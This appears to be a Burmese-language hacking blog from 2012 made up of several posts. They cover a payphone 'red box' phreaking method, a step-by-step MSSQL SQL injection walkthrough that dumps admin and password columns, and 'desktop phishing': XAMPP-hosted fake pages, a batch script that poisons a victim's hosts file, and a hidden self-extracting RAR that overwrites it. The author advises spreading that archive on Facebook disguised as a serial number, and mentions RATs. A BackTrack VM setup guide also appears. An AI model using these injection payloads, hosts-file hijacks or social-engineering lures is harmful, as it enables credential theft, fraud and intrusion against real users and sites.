Phreaking ဆိုတာ ကြန္ပ်ဴတာေလ့လာသူေတြ telecommunication system ကိုေလ့လာေနတဲ့သူေတြ ရဲ့ အေလ့အက်င့္ ေပၚမွာ ျဖစ္ေပၚလာတဲ့ စကားလံုးေလးတစ္ခုေပါ့။ ေခတ္ အဆက္ဆက္ ျဖစ္ေပၚလာတဲ့ စကားေလးလဲျဖစ္တယ္။ Kevin Mitnick တို့ ေခတ္ကတည္းက သံုးလာတဲ့ method ေလးေပါ့။ Apple CEO ေဟာင္းတစ္ေယာက္ျဖစ္တဲ့ Steve Wazoniak က လဲ phone phreaking ကို အသံုးျပဳခဲ့ဘူးတယ္လို့လဲၾကားဖူးပါတယ္။ Phone Network vulnerabilities ေတြကို သံုးျပီး phone company ေတြကို hack တယ္ျပီးေတာ့ အလကားသံုးလို့ရေအာင္လုပ္တယ္။
ဒီ method က ကၽြန္ေတာ္တို့ နိုင္ငံေတြမွာေတာ့ နဲနဲခက္မယ္။ စမ္းလို့ေတာ့အဆင္မေျပဘူး။ မိရင္ေတာ့ အင္းစိန္တို့ ထိုးဘို တို့ ကို တန္းေနတာပဲ :D ။ ဘာေတြဘယ္လိုလုပ္လဲဆိုတာေျပာမယ္ အိုေက အဆင္သင့္ျဖစ္ရင္ စမယ္။
Boxing
Boxing ဆိုတာ နိုင္ငံျခားဇာတ္ကားေတြထဲက ပံုးအနီေရာင္ေလးထဲက ဖုန္းေလးကို Free ေျပာလို့ရေအာင္ Phreak လုပ္တဲ့နည္းေလးေပါ့။Phreaking လုပ္မယ္ဆိုရင္ location က remote location ျဖစ္ဖို့လိုမယ္။ အဲ့မွာ Boxing မွာ Boxes ေတြအမ်ားၾကီး ရွိတယ္။ ျပီးေတာ့ အဲ့Box ေတြကို အေရာင္ေတြနဲ့ သတ္မွတ္တယ္။ Red Box , Blue Box, Beige Box ဆိုျပီးသတ္မွတ္ထားတာတယ္။ အဲ့ထဲမွာမွ Blue Box က နဲနဲေဟာင္းသြားတဲ့ method ျဖစ္သလို နာမည္ၾကီးသြားခဲ့တဲ့ method လဲျဖစ္ပါတယ္။ Red Box ကေတာ့ ယေန့ထက္ထိ local calling ေတြ Pay telephones ေတြက ေန အလကားေျပာလို့ရေအာင္လုပ္လို့ရတယ္။ ဒီ method ကနဲနဲေတာ့စိတ္ဝင္စားဖို့ေကာင္းတယ္ ေနာ္္ဟုတ္တယ္ဟုတ္  ။ ဘယ္လိုဖုန္းအမ်ိဳးအစားေတြမွာ အလုပ္လုပ္မလဲ ဆိုေတာ့ older telephones ေတြမွာ အလုပ္လုပ္ပါတယ္တဲ့ ;D ။
Phreaker ေတြရဲ့ main target telephone အမ်ိဳးအစားေတြကေတာ့ cocots and fortress phone ေတြပဲျဖစ္ပါတယ္။ Cocots ဆိုတာ ဘယ္လို့မ်ိဳးလဲဆိုတာေတြးလိုက္မိပါလိမ့္မယ္။ Cocots ဆိုတာ customer owned, controlled, and operated telephone ေတြျဖစ္ပါတယ္။ တနညး္အားျဖင့္ စီးပြားေရးလုပ္ငန္းတစ္ခု ကေန သူတို့ စီးပြားေရးဧရိယာ ထဲက ဖုန္းခြန္ေဆာင္တဲ့ ရတဲ့ ဖုန္းေတြကို သူတို့က ကိုယ္စားလွယ္ေပးေဆာင္ေပးတဲ့ ဖုန္းအမ်ိဳးအစားေတြေပါ့ Cocots ဆိုတာ။ Cocots ဟုတ္မဟုတ္ဘယ္လိုသိနိုင္လဲ။ Cocots ေတြထဲမွာ Company sticker ေတြကို တစ္ခုလံုးကပ္မထားဘူးေပါ့။ Bell network တို့ At&t တို့လို မ်ိဳူးေပါ့။ ခု ဒီမွာေတာ့ အဲ့ဖုနး္အမ်ိဳးအစားေတြကို သံုးေနတဲ့ ကုမၸဏီ တစ္ခုေပါ့။
Red Box ဘယ္လိုလုပ္မလဲ….။
၁။ yak-bak ဆိုတဲ့ကေလးကစားစ၇ာအရုပ္ေလးေတြရွိတယ္။အဲ့လိုမ်ိဳးေလးတစ္လံုးဝယ္လိုက္မယ္
၂။ ျပီးရင္ tone ေတြကိုအင္တာနက္ကေဒါင္းမယ္။ phreaking software ေတြရွိပါတယ္ winphreak လိုမ်ိဳးေတြေပါ့
၃။ ဒါမွမဟုတ္ရင္ payphone ေတြကေနtones ေလးေတြယူလို့ရပါတယ္။
၄။ Payphone ေတြဆီကို သြား ပိုက္ဆံျပားေလးထည့္လိုက္မယ္။
၅။ ျပီ္းရင္ Digital answering machine နဲ့ number တစ္ခုကိုေခၚလိုက္မယ္။
၆။ ျပီးရင္ answering machine နဲ့ အိမ္ကို ျပန္မယ္ ျပီးရင္ Yak-bak ထဲကို tone ထည့္လိုက္မယ္။
၇။ Yak-bak memory ကို overwrite မျဖစ္ခ်င္ရင္ record button နဲ့ ျဖဳတ္ထားလို္က္ေပါ့။ :D
၈။ ျပီးရင္ Pay phone ရဲ့ mouthpiece ထဲကို Yak-bak က tone ကို ဖြင့္ေပးလိုက္။
၉။ ကဲ Thank you လို့ေျပာသံၾကားလိုက္ရင္ ေပ်ာ္လိုက္ေတာ့။ ဖုန္းကို အမုန္းေျပာလို့ရျပီ။ Tone တစ္ခုက Red box ရဲ့ Vulnerable ျဖစ္ေနတာပါပဲ။

ဒီပို့စ္ေလးဟာ သိသင့္သိထိုက္တဲ့ ဗဟုသုတေလးအေနနဲ့ေရးလိုက္တာပါ။ သံုးလို့မရရင္ေတာင္ သိထားသင့္တယ္ထင္လို့ပါ။ တစ္ခ်ိန္က နာမည္ၾကီးခဲ့တဲ့ နည္းေလး ၊လူ အမ်ားအံ့အားသင့္ေလာက္ေအာင္ အစြမ္းျပနိုင္ခဲ့တဲ့ နည္းေလးျဖစ္ပါတယ္

post by Fortran
copy from ghostarea.net
Read More ->>

Friday, July 20, 2012

MSSQL Injection

 

 

What is MSSQL?

အိုေခ ဒါဆို Attack လုပ္ပံုစလိုက္ၾကရေအာင္ ..ေရွ႕က Union Select Injection ကို ေရးျပီးသားျဖစ္လို႕ အရမ္းအေသးစိတ္ေတာ့ မရွင္းျပေတာ့ပါဘူး ။ ေရွ႕ ကဟာနားလည္ရင္ ဒီ တစ္ပုဒ္က အခက္အခဲေတာ ့ သိပ္ၾကီးမွာမဟုတ္ပါဘူး ။
1.Finding Vulnerability
2.Findng Number of Columns
3.Finding Vulnearble Column
4.Finding MySQL Version
5.Finding Tables in Database
6.Finding Columns
7.Displaying content
8.Cracking the hash
9.Finding Admin Page
1.Finding Vulnerabiltiy
www.site.com ဆိုပါစို႕
www.site.com/index.asp?id=1 ေပါ့ :-D
www.site.com/indexp.asp?id=’1 ဆိုရင္
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘department_id=1024”.
/deptdet.asp, line 122
လို Error တက္လာပါလိမ့္မယ္ ။
2.Finding Number of Columns
ပံုမွန္အတိုင္းပဲ Column အေရအတြက္ ရွာပါမယ္ ။
www.site.com/index.asp?id=1 order by 1–
ဆိုျပီးေပါ့ ။
[error] Microsoft SQL Native Client error ’80040e14′
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
[/error]
ဒီလို Error မတက္မခ်င္းပါ
www.site.com/index.asp?id=1 order by 11–
မွာ Error တက္တယ္ဆိုပါစို႕ 11 မဟုတ္တဲ့သာမန္ 1,2,3 ထဲမွာ တက္မွာမဟုတ္ပါဘူး ဒါဆို 11 ခုေပါ့ ။
3.Finding the vulneable column
www.site.com/index.asp?id=1 and 1=2 union select 11,22,33,44– ေပါ့
1=2 ဆိုတာ False ျဖစ္ျပီး Error ေပၚေအာင္ ထည့္တဲ့သေဘာပါ id=-1 ဆိုရင္လည္းရပါတယ္ ။ တျခား သေဘာတရားတစ္ခုကို ေျပာျပတဲ့အေနနဲ႕  အသစ္ေျပာင္းေပးတာပါ။
Mysql တုန္းကလိုပဲ Vuln ျဖစ္တဲ့ Column ေပၚပါ့မယ္ ။ 44 ဆိုပါစို႕
ဒါဆို 44 မွာ Mysql Command Execute လုပ္ႏုိင္ပါတယ္ ။
4.Finding MySQL Version
ေရွ႕ကလိုပါပဲ 44 မွာ @@version ဆိုတဲ့ COmmand ကို execute လုပ္ပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 union select 11,22,33,@@version–
Version တက္မယ္ေပါ့ ။
5.Finding the Table Name
Myssql မွာ table_name from information_schema.tables– သံုးပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables– ေပါ့
ဒါဆို table name တစ္ခု တတ္လာပါလိမ့္မယ့္ ။
vuln ဆိုပါစို႕
ဒါေပမယ့္ ကၽြန္ေတာ္တုိ႕လိုခ်င္တဲ့ User တို႕ Admin တို႕လို Table မ်ိဳးမဟုတ္ပါဘူး ဒီေတာ့ ထပ္ျပီး Try ပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in (‘vuln’)–
သေဘာကေတာ့ vuln မဟုတ္တဲ့ တျခား Table ေပါ့ ဒါဆို usr လိုဟာမ်ိဳးတက္လာျပီဆုိပါစို႕
6.Finding Column Name
usr Table တက္လာျပီဆိုတဲ့ အဲ့ဒီ့ Table ထဲကေန Column ထုတ္ပါ့မယ္ ။
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name=’usr’–
usr ထဲက Column တက္လာပါ့မယ္ Admin ဆိုပါစို႕
တျခား Admin မဟုတ္တဲ့ Password လို Column မ်ိဳးအလိုရွိေသးတဲ့အတြက္ အေပၚ က Table ခြဲတံုးကလိုပဲ ထပ္ Inject လုပ္ပါ့မယ္ ။
www.site.com/index.asp?id=1 and and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name=’usr’ and
column_name not in (‘Admin’)–
ဒီတေခါက္ Password ဆိုတဲ့ Column တက္လာျပီဆုိရင္ ကၽြန္ေတာ္တို႕ Data Inject လုပ္ဖို႕ပဲလိုပါေတာ့တယ္ ။
7.Displaying Content
ခုနက ကၽြန္ေတာ္တို႕မွာ Admin နဲ႕ Password ဆိုတဲ့ Column ႏွစ္ခုရထားပါျပီ ဒါဆုိ ဆက္ပါ့မယ္..
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,Admin from usr–
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,Password from usr–
ဒါဆို Admin နဲ႕ Password တက္လာပါျပီ :-D
က်န္တဲ့ႏွစ္ဆင့္ကေတာ့ အမ်ားၾကီးဆက္ေျပာစရာမလိုေတာ့ မေျပာေတာ့ပါဘူး

posted by negative thunder
copy from ghostarea.net
Read More ->>

Wednesday, July 18, 2012

Desktop phishing part:2




Part :1 မွာတတုန္းက ကၽြန္ေတာ္တို႕ xampp နဲ႕ သင့္ computer ကို host ထို္င္ဖို႕ ေျပာခဲ့ပါတယ္……အဲဒီလိုေျပာခဲ့တဲ့ေနရာမွာ xampp ကို အသံုး ျပဳနည္း tutorial ကို မေဖာ္ျပ လိုက္ရပါဘူး ။ ဒီ part:2 မွာၾကေတာ့ host ထိုင္ပံုေတြ ျပီးေတာ့ ကၽြန္ေတာ္ တို႕ host file ေတြကို ျဖန္႕ေ၀ပံုေတြကိုဆက္လက္တင္ျပေပးသြားမွပါ…….။
အရင္ဆံုးအေနနဲ႕ xampp ကိုေဒါင္းလုပ္ခ်ရပါမယ္…..။xampp နဲ႕ လုပ္ထားတဲ့ ဆိုက္ေတြအမ်ားၾကီးရိွသလို ဒါနဲ႕ ပက္သက္ျပီးေတာ့ xploit ေတြအမ်ားၾကီးရိွတယ္…ေနာက္ေတာ့ မွ အလွ်င္းသင့္သလိုေဖာ္ျပေပးမွာျဖစ္ပါတယ္…။

Download

ျပီးရင္ ကၽြန္ေတာ္တို႕ အေနနဲ႕ လြယ္ကူစြာ install လုပ္ႏိုင္ပါတယ္…..


ေနာက္တစ္ဆင့္အေနနဲ႕ သင္ဒီလိုျမင္ရမွာပါ…..။အဲဒီကိုေရာက္သြားရင္ No(1) ကိုႏွိပ္လိုက္ပါ…..။ xampp control panel ကို စတင္ဖို႕ျဖစ္ပါတယ္……။ဒီေနရာမွာ option ေတြ ပါေသးတယ္…..။ပံုေလးကိုၾကည့္လိုက္ပါ….။





အဲဒီလို No(1) option ကိုသြားမယ္ဆိုရင္ control panel ထဲေရာက္သြားလိမ့္မယ္………။



အဲဒီမွာလဲ function ေတြအမ်ားၾကီးပါပါတယ္…..။ Apache, FileZilla , MySql တို႕အျပင္ ေနာက္ထပ္ function ေတြလဲပါ၀င္ပါေသးတယ္…..။ဒီပိုစ့္မွာေတာ့ Apache ကိုပဲသံုးသြားမယ္…..။
ေနာက္တစ္ဆင့္အေနနဲ႕ Apache sever ကိုသံုးဖို႕အတြက္ Start ကိုကလစ္လိုက္ပါ…….။
ျပီးရင္ ဆာဗာ အလုပ္မလုပ္ စမ္းသပ္ၾကည့္ရေအာင္……။


ဘယ္လိုလုပ္ရမလဲဆိုေတာ့ သင့္ browser ဖြင့္ျပီးရင္ local machine address ကို သြားလိုက္ ……(127.0.0.1) ျဖစ္ပါတယ္……အဲဒါကို localhost လို႕လဲေခၚပါတယ္….တကယ္လို႕ sever အလုပ္ လုပ္ရင္အထက္ကအတိုင္း ျမင္ရလိမ့္မယ္……။



ေနာက္တစ္ဆင့္အေနနဲ႕ internet ေပၚမွာအလုပ္မလုပ္စမ္းၾကည့္မယ္…….။သင့္ browser ထဲမွာ Public/External Ip ကို ရိုက္ထည့္လိုက္ အထက္ကပံုအတိုင္းေတြ႕ ျမင္ရပါလိမ့္မယ္…။
ေနာက္တစ္ဆင့္အေနနဲ႕httpd-xamp.conf ဆိုတဲ့ဖိုင္ကိုသြားျပီး ျပဳျပင္ရမွာပါ ….အဲဒီကိုသြားရန္  Drive:\xampp\apache\conf\extra အဲဒီလို path အတိုင္းသြားႏိုင္ပါတယ္.. အဲဒီကိုေရာက္ရင္ Deny from all ကိုရွာျပီးျဖတ္ျပစ္လိုက္ပါ.ျပီးရင္ Ctrl+s ကိုႏွပ္ျပီး ေဆ့လိုက္ပါ…..။ေအာက္မွာပံုေလးနဲ႕ေဖာ္ျပထားတယ္……။




အဲျပီးရင္ သင့္ phishing လုပ္မယ့္ဖိုင္ေတြကို drive:\xampp\htdocs စတဲ့ path အတိုင္းသြားလိုက္ျပီးေတာ့ ေနရာခ်လိုက္…ေျပာခ်င္တာကအဲဒီမွာသြားထည့္လိုက္ေပါ့ဗ်ာ..။
အဲသင့္ဖိုင္ေတြ (သိဳ႕) သင့္ phishing page ေတြ ကိုဘယ္လိုျပန္ၾကည့္ရမလဲဆိုေတာ့http://localhost/anything.html  or http://127.0.0.1/anything.html စတဲ့အတိုင္းျဖစ္ပါတယ္….အဆိုပါလင့္ႏွစ္ခုဟာ သင့္စက္ထဲမွာပဲအလုပ္လုပ္မွာပါ…..internet ေပၚမွာစမ္းသပ္ခ်င္တယ္ဆိုရင္
http://xxx.xxx.xxx.xxx/anything.html အဲဒီလိုမ်ိဳး ျပန္ၾကည့္ႏိုင္ပါတယ္…..။ xxx.xxx.xxx.xxx ဆိုတာ သင့္ public IP ျဖစ္ပါတယ္…..။
ကၽြန္ေတာ္တို႕ ခုလို  host ထိုင္ျခင္းကို ဆက္မလုပ္ခ်င္ဘူးဆိုရင္ control panel ထဲမွာ ၀င္ေရာက္ျပဳျပင္ႏိုင္ပါတယ္……..။
Filezilla, MySql စတဲ့ function မ်ားပါ၀င္တာေၾကာင့္ မိမိစိတ္တိုင္းက်မိမိလုပ္ႏိုင္ပါတယ္…….ေနာက္ျပီး….no-ip.com လိုဟာမ်ိဳးကို ကိုယ္ညဏ္ရိွသလို အသံုးခ်ႏိုင္ပါတယ္….

ကဲ hsot sever ေတာ့တိုင္ျပီးသြားပါျပီ ေနာက္တံုးအဆင့္ကေတာ့ Modify victim’s host file ျဖစ္ပါတယ္….သာေကာင္းေတြဆီက host ဖိုင္ေတြကို ျပဳျပင္ရမွာပါ……။နည္းႏွစ္နည္းရိွပါတယ္….။တစ္ခုက script ေရးျပီးေတာ့ overwrite လုပ္တာ ေနာက္တစ္ခုက online ေပၚမွာ ျဖန္႕ေ၀တာ…….။Script ေရးတာကလြယ္ပါတယ္…..ေအာက္ေဖၚျပပါ code ေတြကို ကူးျပီးေတာ့ .bat နဲ႕ ေဆံလိုက္ျပီး မိမိသားေကာင္ရဲ႕စက္ထဲမွာ run လိုက္ရံုပါ ပဲ။

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
 
 
ဒီေနရာမွာ xxx.xxx.xxx.xxx ဆိုတာ ထံုးစံအတိုင္း မိမိ public Ip ျဖစ္ပါတယ္…….။
ေနာက္တစ္ခုကေတာ့ online ေပၚမွာျဖန္႕ေ၀ျခင္းပါ………။winrar ကိုသံုးမွာပါ…..။အဲဒီထဲက SFX Function ကိုသံုးမွာျဖစ္ပါတယ္……။
အရင္ဆံုးအေနနဲ႕ host  file တစ္ခုကို အရင္ဆံုး download ဆြဲလိုက္ပါ…..။
ျပီးရင္ အဲဒီ့ host ဖိုင္ကို မိမိ public Ip ေတြထည့္ျပီးေျပာင္းလိုက္ပါ…….။
 
 

xxx.xxx.xxx.xxx ဆိုတာထံုးစံအတိုင္း သင့္ public Ip ျဖစ္ပါတယ္…….။ကဲ အဲဒီလိုသင့္ host ဖိုင္ကိုျပဳျပင္ေျပာင္းလဲျပီးျပီ ဆိုရင္ rar ဖိုင္လုပ္လိုက္ရေအာင္.. ..။
ပထမဆံုး အေနနဲ႕ ေအာက္ေဖာ္ျပပါပံုကေတာ့ rar ဖိုင္ျပဳလုပ္ျခင္းျဖစ္ပါတယ္……။
 
 

ဒုတိယအဆင့္အေနနဲ႕ create SFX archive ကိုေရြးပါ……။




အဲျပီးရင္အထက္ကအတိုင္း Advanced ထဲသြားလိုက္ျပီးရင္ SFX options ကိုကလစ္လိုက္…..ေအာက္ပါပံုအတိုင္း Box တစ္ခုက်လာလိမ့္မယ္……။



ကၽြန္ေတာ္အရင္အပိုင္ တစ္တုန္းကေျပာခဲ့ပါတယ္……host file ဆိုတာ C:\Windows\System32\drivers\etc\host\ အဲဒီလို path အတိုင္းရိွပါတယ္…….။ဒီလိုဆိုရင္ ကၽြန္ေတာ္တို႕ သားေကာင္ရဲ႕ host file အေပၚမွာ ကၽြန္ေတာ္တို႕ ရဲ႕ host file ကို overwrite ျဖစ္ေအာင္….တစ္ခါတည္းးး…….extract လုပ္ရင္ဖြင့္ခ်မယ့္ path ကိုထည့္သြင္းေပးရမွာပါ……..။ဒီလိုလုပ္ျခင္းျဖင့္ သားေကာင္ဟာ……ခု ကၽြန္ ေတာ္တို႕လုပ္ထားတဲ့ rar ဖိုင္ကို extract လုပ္လိုက္တာနဲ႕ တစ္ခါတည္း…..သူ႕ host file မွာ overwrite လုပ္ျပီးသြားျဖစ္သြားလိမ့္မယ္…။






ျပီးရင္ Modes ထဲသြားျပီးေတာ့ Hide all ကိုေရြးလိုက္ပါ…စိတ္ခ်ရေအာင္လို႕ေလ…..။




ေနာက္ဆံုးလုပ္ေဆာင္ခ်က္အေနနဲ႕ အထက္ေဖၚျပပါပံုအတိုင္း…….Update ထဲကိုသြားျပီး ေဖာ္ျပပါအတိုင္ေရြးလိုက္ပါဦး…..။
ဒီအဆင့္ျပီးရင္ ျပီးျပည့္စံုတဲ့ rar ဖိုင္ေလးရပါျပီ……..။ဒါေလးကို ကိုယ့္သားေကာင္ေတြအေနနဲ႕ extract လုပ္ျပီးဖြင့္ခ်ဖို႕ပဲလိုပါတယ္…….။ဒီနည္းကို ကိုယ္ညဏ္ရိွသေလာက္တျခားေနရာေတြမွာလက္ေတြ႕စမ္းသပ္ႏိုင္ပါတယ္…….။ဥပမာ RAT လိုဟာမ်ိဳး႕ ျဖန္႕တာေပါ့…….။
ကို္ယ္လုပ္ျပီးသား ဒီ rar ဖိုင္ကို social network (facebook) လိုေနရာမ်ိဳးေတြမွာ က်ယ္ျပန္႕စြာျဖန္႕ေ၀ႏိုင္ပါတယ္………။
ကၽြန္ေတာ္ကေတာ့ serial number လိုလို ဘာလိုလို ေပါ့ လဲလိုမ်ိဳးျဖန္႕တာကပိုေကာင္းမယ္ထင္တာပဲ…..။
SE ေပါ့ ယံုေအာင္လုပ္ျပီေ၀ေပးလိုက္…..ဒီနည္းေလးကေတာ္ေတာ္မိုက္တယ္…..ဗ်….။
တကယ္ေတာ့ကၽြန္ေတာ္လဲေလ့လာဆဲလူတစ္ေယာက္ပါ……ဒါေၾကာင့္ဒီပိုစ့္မွာ အမွားတစ္ခုခု ပါသြားခဲ့ရင္ၾကိဳတင္ေတာင္းပန္ပါတယ္……။
Desktop phishing part 2 ကေတာ့ဒီမွာတင္ျပီးပါျပီ…….။
ေနာက္လဲၾကိဳးစားပါဦးမည္……။
 

posted by Me
You also see in here
Read More ->>

Saturday, July 14, 2012

VMware installation with backtrack5 on Window 7




အခု ကၽြန္ေတာ္တို႕ Backtrack 5 ကို vmware player နဲ႕ window 7 ေပၚမွာတင္ပါမယ္ vmware player / vmware workstation ဆိုျပီး၂မ်ိဳးရိွပါတယ္ သူက linux system မွာလိုပဲ wine နဲ႕တူပါတယ္ သူက OS တစ္ခုေပၚမွာ တစ္ျခား OS တစ္ခုကို run ေပးႏိုင္ပါတယ္….. သူကိုအရင္စက္ထဲ install လုပ္ရေအာင္ပါ ………..ေအာက္ကလင့္မွာသြားျပီးေဒါင္းလိုက္ပါ…  https://www.vmware.com/  support and download ထဲမွာသြားျပီး register လုပ္ျပီး free download လုပ္လို႕ရပါတယ္…သူ႕ကိုေတာ့ စက္ထဲ install လုပ္နည္းမေျပာေတာ့ပါဘူး ကြန္ကသိပ္မေကာင္းလို႕ပါ အဲ့ေလာက္ေတာ့လုပ္တတ္မယ္ထင္ပါတယ္ သြင္းျပီးသြားရင္ Vmware player ကိုစျပီး run ပါမယ္ စဖြင့္လိုက္ပါပုံမွာျပထားတဲ့အတိုင္းေပၚလာပါမယ္….:P


Next ကိုႏိွပ္လိုက္ပါ ေနာက္တစ္ပုံကိုၾကည့္ပါ………..


Next ပဲႏိွပ္လိုက္ပါ……..


ျပီးရင္ Next ပဲႏိွပ္လိုက္ပါ……..


Yes လိုက္ပါ ေနာက္ OK ေပါ့…..ေနာက္တစ္ပုံကိုၾကည့္ပါ……….


ကဲ ညာဖက္အေပၚဆုံးက Create New Virtual Machine ကုိႏိွပ္ပါ ေအာက္ကပုံအတိုင္းက်လာပါလိမ့္မယ္……….:P


အဲ့မွာ ဘယ္ေနရာကေန guest operating system ကို install လုပ္မလဲေမးေနပါတယ္ အဲ့ေတာ့ ကၽြန္ေတာ္တို႕ကေခြကေနေမာင္းတင္မလား စက္ထဲက Iso ဖိုင္ကေနတစ္ဆင့္ေမာင္း တင္မလားေရြးရပါမယ္ အဆင္ေျပတဲ့ေနရာကေနေရြးေပးလိုက္ေပါ့ေနာ္ ကၽြန္ေတာ္ကေတာ့ CD:Drive ကေနေမာင္းတင္ပါမယ္……..ေနာက္တစ္ပုံကိုၾကည့္ပါ…………:P


အဲ့ေနာက္ ကိုတင္မွာ system ကိုေရြးေပးရပါမယ္….အခုကၽြန္ေတာ္တို႕က Linux system ကိုတင္မွာပါ Linux ကိုေရြးေပးပါေနာက္ ေအာက္မွာ Ubuntu ကိုေရြးေပးလိုက္ပါ ဘာလို႕လဲ ဆိုေတာ့ Backtrack က Ubuntu Base ျဖစ္လို႕ပါ…………အေပၚကပုံမွာျပထားပါတယ္အဲ့အတိုင္းေရြးျပီးရင္ Next ကိုႏိွပ္ပါ……………:P


နာမည္ေပးလိုက္ပါ အခု Backtrack ကိုတင္တာဆိုေတာ့ BT 5 R2 ေပါ့ အဲ့လိုေပးျပီး Next ႏိွပ္လိုက္ပါ………………..:P



ေနာက္သူ႕ကိုဘယ္ေလာက္ space ေပးမလဲေပါ့ ကို္ယ္စက္ရဲ႕space အေနအထားကိုလုိက္ျပီးေပးလိုက္ပါကၽြန္ေတာ္ကေတာ့ 20GB ေပးထားပါတယ္ေနာက္ Split virtual disk into Multiple files ကိုေရြးေပးျပီး Next ကိုႏိွပ္လို္က္ပါ………..:P


ကိုယ့္စက္ကဘယ္ေလာက္ Hardware ကိုသုံးမလဲဆိုတာသူျပပါလိမ့္မယ္ ကိုယ္ကျပင္ခ်င္တယ္ဆိုရင္ Customize Hardware ကိုႏိွပ္ျပီးစိတ္ၾကိဳက္ျပင္ႏိုင္ပါတယ္ ေနာက္ Finish ကိုႏိွပ္ ပါ………


သူဟာသူ install လုပ္ျပီးတက္လာပါလိမ့္မယ္…….ပုံမွာၾကည့္ပါ…….





Enter ႏိွပ္လို္က္ပါ Defult username: က root ပါ password က toor ပါ ေနာက္ startx လို႕ command ေပးျပီး၀င္ႏိုင္ပါတယ္…………………….:P


အသုံးျပဳပုံအားလုံးကတူတူပါပဲ အခုက window 7 ေပၚမွာတင္ျပီအသုံးျပဳလုိ႕ရပါတယ္စမ္းျပီးသုံးၾကည့္ပါ ကိုယ့္ကိုစိတ္တိုင္းက်ျပီဆိုမွာ Dual Boot နဲ႕တင္ျပီးသုံးပါ အၾကံေပးတာပါ အားလုံးက linux  ဆိုရင္ေၾကာက္ၾကပါတယ္ ဘာမွန္းလဲမသိဘူးဘာျဖစ္တယ္ညာျဖစ္တယ္ေပါ့ အခုလိုတင္ျပီးသုံးၾကည့္လိုက္ပါ ၾကိဳက္တယ္အဆင္ေျပႏိုင္တယ္ဆိုမွာ တင္သုံးပါ အၾကံ ေပးတာပါ ေက်းဇူးတင္ပါတယ္ ေအာ္ ၾကားထဲမွာ ခ်န္ခဲ့တဲ့ဟာေတြရိွပါေသးတယ္ အဲ့ဒါက Next ေတြ ပဲႏိွပ္ရမွာမိုလို႕မေျပာေတာ့ပါဘူး………ဆက္လက္ၾကိဳးစားပါအုံးမယ္ေက်းဇူးတင္ပါတယ္

မွတ္ခ်က္။      ။ဒီပိုစ့္အတြက္ ကၽြန္ေတာ့္သူငယ္ခ်င္း မူရင္းေရးတဲ့သူျဖစ္တဲ့ negative thunder ကိုေက်းဇူး တင္ပါတယ္.....။သူၾကိဳးစားထားတာကို ကၽြန္ေတာ္ျပန္လည္ကူးယူေဖာ္ျပေပးလိုက္တာပါ...။

Read More ->>

Desktop Phishing Part I : Introduction & Attacking Theory



Introduction

ကၽြန္ေတာ္တို႕ႏိုင္ငံမွာရိွတဲ့ လူမ်ားအေနနဲ႕ Phishing method ကိုအေတာ္မ်ားမ်ားသိရိွၾကမယ္လို႕ယူဆပါတယ္….။ကၽြန္ေတာ္ကို္ယ္တိုင္လဲ Tutorial ေတြေရးခဲ့ဘူးပါတယ္…။ဒါေပမယ့္လူတိုင္းသိၾကတာတစ္ခုကေတာ့ Phishing ကို method တစ္မ်ိဳးအေနနဲ႕သာသိရိွခဲ့ ၾက ပါတယ္…။Phishing ဆိုတဲ့ေနရာမွာ method ေပါင္းအမ်ိဳးခြဲ မ်ားစြာရိွ ေသးတယ္ဆိုတာ ကို သိရိွသူေတာ္ေတာ္နည္းပါတယ္…။ (မွတ္ခ်က္။   ။ေနာက္ ၾကမွပိုစ့္တစ္ပုဒ္အေနနဲ႕ေရးေပးပါ့မယ္)……….။ ေနာက္ျပီးေတာ့ Phishing ကိုလူေတာ္ေတာ္မ်ားမ်ားက အထင္ေသးတတ္ၾကပါေသးတယ္..။ ေနာက္ျပီးေတာ့ phishing ဆိုတာကို နည္းနည္းေတာ့ထပ္ေျပရပါလိမ့္မယ္…။ Phishing ဆိုတာ…Hacker ေတြဟာ Duplicate page လို႕ေခၚတဲ့ အစစ္အတိုင္း ပြားယူထားေသာ (မိတၱဴ) web စာမ်က္ႏွာမ်ားကို ျပဳလုပ္ျပီး သာေကာင္မ်ားရဲ႕ အခ်က္အလက္ (password) မ်ားကို လိမ္လည္လွည့္ ျဖား ယူေဆာင္ျခင္း ျဖစ္ပါတယ္…။ ဒါေပမယ့္ ဒီပိုစ့္မွာအေျခခံသေဘာတရာေတြကို ရွင္းျပမေနေတာ့ပဲ…….method တစ္ခုျဖစ္တဲ့ Desktop phishing အ ေၾကာင္းကိုပဲရွင္းလင္ေရးသာသြားမွာပါ..။

အရင္က အေျခခံ phishing method သေဘာတရားေတြအရ ကၽြန္ေတာ္ တို႕ဟာမိမိ သားေကာင္ရဲ႕ Password ေတြရဖို႕ web hosting တစ္ခုျပဳ လုပ္ျပီးရင္ဖိုင္ေတြတင္ ျပီးရင္ မိမိရဲ႕ duplicate page ဗတြကို သားေကာင္ေတြဆီကို ေရာက္ေအာင္တစ္နည္းနည္းျဖင့္ ပို႕လြတ္ရပါတယ္…။ ဒီလိုနဲ႕ သားေကာင္ေတြဆီကေန အယုံ သြင္ျဖားေယာင္းျပီးေတာ့ Data ေတြကို လိမ္လည္ ရယူခဲ့ၾကပါတယ္…။ ဒါေပမယ္ဒီနည္းလမ္းဟာ အေျခံခံ ဗဟုသုတ ရိွတဲ့သားေကာင္ေတြ ေတာင္မွ အလြယ္တကူ ရိပ္မိ သိရိွႏိုင္ပါတယ္….။ အဲေနာက္ပိုင္းမွာေတာ့ hacker ေတြဟာသူတို႕ URL ေတြကို မရိပ္မိေအာင္ လို႕ URL  shortener ေတြကို အသံုးျပဳလာၾကပါတယ္…။ဘယ္လိုပဲ ေဖ်ာက္ဖ်က္ လိမ္ညာေပမယ္ သားေကာင္ အနည္းစု ကိုသာ လွည့္ျဖားႏိုင္ ခဲ့ ၾက ပါတယ္…။ဒီလိုနဲ႕ 